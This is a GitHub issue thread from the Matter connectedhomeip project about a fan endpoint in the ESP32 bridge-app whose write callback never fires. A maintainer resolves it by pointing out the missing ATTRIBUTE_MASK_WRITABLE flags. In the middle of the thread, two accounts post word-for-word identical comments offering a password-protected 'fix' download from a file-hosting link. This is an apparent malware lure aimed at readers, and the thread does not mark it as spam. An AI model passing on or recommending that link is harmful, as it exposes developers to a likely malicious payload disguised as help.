project-chip/connectedhomeip #35211: [1.2]After adding a fan to the bridge device, the write callback cannot be triggered.

WOLEN6914183, 2024-08-27:
### Reproduction steps

1 Prerequisites 
     1.1. sdk matter-1.2-branch
     1.2. esp-idf 5.1
     1.3. bridge-app
2.Using the ZAP tool, add a fan device to Endpoint 3 in the bridge-app.zap as shown in the image below.
[image]
[image]

3. The fan code under the bridge-app example
    3.1 Fan atrribute declare 
  DECLARE_DYNAMIC_ATTRIBUTE_LIST_BEGIN(FanAttrs)
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanMode::Id, ENUM8,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanModeSequence::Id, ENUM8,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::PercentSetting::Id, PERCENT,2,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::PercentCurrent::Id, PERCENT,2,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedMax::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedSetting::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedCurrent::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FeatureMap::Id, BITMAP32,4,0), 
   DECLARE_DYNAMIC_ATTRIBUTE_LIST_END();
   constexpr CommandId fanIncomingCommands[] = {
    app::Clusters::FanControl::Commands::Step::Id,
    kInvalidCommandId,
};
   3.2 Fan cluster declare

   DECLARE_DYNAMIC_CLUSTER_LIST_BEGIN(bridgedFanClusters)
   DECLARE_DYNAMIC_CLUSTER(FanControl::Id, FanAttrs, nullptr, nullptr),
    DECLARE_DYNAMIC_CLUSTER(Descriptor::Id, descriptorAttrs, nullptr, nullptr),
    DECLARE_DYNAMIC_CLUSTER(BridgedDeviceBasicInformation::Id, bridgedDeviceBasicAttrs, 
    nullptr,nullptr) DECLARE_DYNAMIC_CLUSTER_LIST_END;

   3.3 Fan Endpoint declare

     DECLARE_DYNAMIC_ENDPOINT(bridgedFanEndpoint, bridgedFanClusters);

   3.4 Fan Write and Read Handlde 
[image]

[image]
  
 4. Device add to Apple Home
   
[image]

5. devoce Log not found emberAfExternalAttributeWriteCallback log
[image]
When I control it, I can receive IM:WriteRequest information. According to the code, it should trigger the emberAfExternalAttributeWriteCallback callback. I have tried adding curtain equipment and switching the equipment on and off. There is no problem, but there is an error in the fan.

This question has been bothering me for a long time. Please help me answer it when you have time.Thank you！

### Bug prevalence

1-2 times week

### GitHub hash of the SDK that was being used

commit 13028cf6bf21f211215ed513e5e03d78b46418eb

### Platform

esp32

### Platform Version(s)

1.2

### Type

Platform Issue

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

WOLEN6914183, 2024-08-27:
Thank you, I will try it first. Can you provide a link to an issue with a similar problem to mine?

bzbarsky-apple, 2024-08-27:
>  DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanMode::Id, ENUM8,1,0),

That `0` at the end says "no attribute flags".  In particular, since it's not setting `ATTRIBUTE_MASK_WRITABLE` there, the attribute is not treated as writable.

You need to use `ATTRIBUTE_MASK_WRITABLE` instead of `0` as the last arg to the macro for attributes that should be writable.

bzbarsky-apple, 2024-08-27:
Also, you would need PercentSetting to have ATTRIBUTE_MASK_NULLABLE, etc....

bzbarsky-apple, 2024-08-27:
https://github.com/project-chip/connectedhomeip/pull/35228 to hopefully improve the documentation here.

closed 2024-08-27 by bzbarsky-apple

WOLEN6914183, 2024-08-28:
Thank you, my problem has been solved, mainly because I referred to the example of bridge-app so I didn't consider that the problem appeared here.